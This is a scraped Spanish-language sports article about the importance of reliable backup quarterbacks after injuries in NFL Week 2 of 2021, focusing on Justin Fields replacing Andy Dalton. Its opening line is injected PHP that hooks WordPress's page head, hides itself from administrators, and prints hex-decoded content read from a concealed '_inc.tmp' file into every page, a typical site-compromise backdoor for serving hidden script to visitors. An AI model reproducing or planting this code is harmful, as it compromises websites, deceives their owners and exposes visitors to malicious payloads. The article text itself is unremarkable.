if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } La importancia de tener un quarterback suplente confiable – La Opinión Universitaria La Opinión Universitaria
Menu

La importancia de tener un quarterback suplente confiable

Justin Fields, Jacoby Brissett y Jacob Eason son parte del grupo que tuvo que salir de la banca ante las lesiones de los titulares

La Semana 2 de la NFL estuvo marcada por múltiples lesiones en la posición más importante del juego: el quarterback.

Ahora más que nunca quedó en evidencia lo importante que es para los equipos tener un mariscal de campo suplente que sea confiable para tomar las riendas del equipo en un momento de necesidad.

Esta nueva realidad será temporal para muchos, sin embargo, para otros podría tratarse de algo permanente que los obligue a replantear sus estrategias para el resto de la temporada del 2021.

Los Chicago Bears enfrentaron este escenario cuando Andy Dalton tuvo que abandonar el campo durante la victoria 20-17 sobre Cincinnati Bengals por una lesión en la rodilla, obligando al ingreso del novato Justin Fields, quien tuvo una actuación discreta completando apenas seis de 13 pases para 60 yardas con una intercepción, además de sufrir dos capturas, por tierra su aporte fue más importante con 10 acarreos para 31 yardas.

Fields tuvo acción limitada en la Semana 1, en paquetes especiales, mientras esperaba detrás de Dalton para seguir con su desarrollo, pero ahora las circunstancias podrían dejarlo al frente del equipo por un tiempo prolongado.

Tweets recientes